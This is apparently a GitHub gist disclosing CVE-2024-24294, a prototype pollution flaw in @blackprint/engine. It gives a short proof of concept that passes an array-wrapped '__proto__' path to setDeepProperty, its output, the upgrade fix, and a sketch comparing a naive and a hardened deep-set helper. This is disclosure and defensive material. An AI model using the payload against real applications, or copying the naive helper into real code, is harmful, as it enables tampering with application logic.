@mestrtee
Last active April 23, 2024 17:59
[CVE-2024-24294] Prototype Pollution vulnerability affecting @blackprint/engine, versions >=0.8.12, <=0.9.1

Overview

Versions of @blackprint/engine from 0.8.12 to 0.9.1 are vulnerable to prototype pollution. The function setDeepProperty recursively assigns the source property to the destination without proper validation, which an attacker can exploit to modify the prototype of Object using a payload like: [["__proto__"], "..."]

PoC:

(async () => {
  const lib = await import('@blackprint/engine');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.default._utils.setDeepProperty({}, [["__proto__"], "polluted"], true);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

Patch:

Upgrade to version 0.9.2 or a later version.
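
For code that cannot upgrade immediately or that carries its own deep-set helper, the sketch below puts a simplified unvalidated path walker next to a hardened one and runs the path from the PoC through both. This is an added example, not code from @blackprint/engine or its fix; naiveSetDeep, safeSetDeep and comparePagePayload are hypothetical names.

```javascript
// Added example: hypothetical helpers, not code from @blackprint/engine.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Simplified unsafe pattern: walks the path with no key validation.
function naiveSetDeep(obj, path, value) {
  for (let i = 0; i < path.length - 1; i++) {
    if (obj[path[i]] === undefined) obj[path[i]] = {};
    obj = obj[path[i]];
  }
  obj[path[path.length - 1]] = value;
}

// Hardened form: validate every key before it is used as a property name.
function safeSetDeep(obj, path, value) {
  if (!Array.isArray(path) || path.length === 0) {
    throw new TypeError('path must be a non-empty array');
  }
  for (const key of path) {
    // ["__proto__"] coerces to "__proto__" on access, so check the type first.
    if (typeof key !== 'string' && typeof key !== 'number') {
      throw new TypeError('path keys must be strings or numbers');
    }
    if (FORBIDDEN_KEYS.has(String(key))) throw new Error(`refusing key "${key}"`);
  }
  let target = obj;
  for (const key of path.slice(0, -1)) {
    // Descend only through own properties, never inherited ones.
    if (!Object.prototype.hasOwnProperty.call(target, key)) target[key] = {};
    target = target[key];
    if (target === null || typeof target !== 'object') {
      throw new TypeError(`"${key}" is not an object`);
    }
  }
  target[path[path.length - 1]] = value;
  return obj;
}

// Runs the page's path through both helpers; reports Object.prototype state.
function comparePagePayload() {
  const path = [['__proto__'], 'polluted']; // path shape taken from the PoC
  const result = {};
  try { naiveSetDeep({}, path, true); } catch (e) { /* ignore */ }
  result.naivePolluted = ({}).polluted === true;
  delete Object.prototype.polluted; // restore global state
  try { safeSetDeep({}, path, true); result.safeRejected = false; }
  catch (e) { result.safeRejected = true; }
  result.safePolluted = ({}).polluted === true;
  return result;
}
```

The type check matters because a guard that only compares keys with `=== "__proto__"` does not match an array-wrapped key, while property access still resolves it to the prototype.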

References

https://github.com/Blackprint/engine-js/commit/bd6b965b03c467e7a58ab0cb89b9172fa5e07013
https://nvd.nist.gov/vuln/detail/CVE-2024-24294
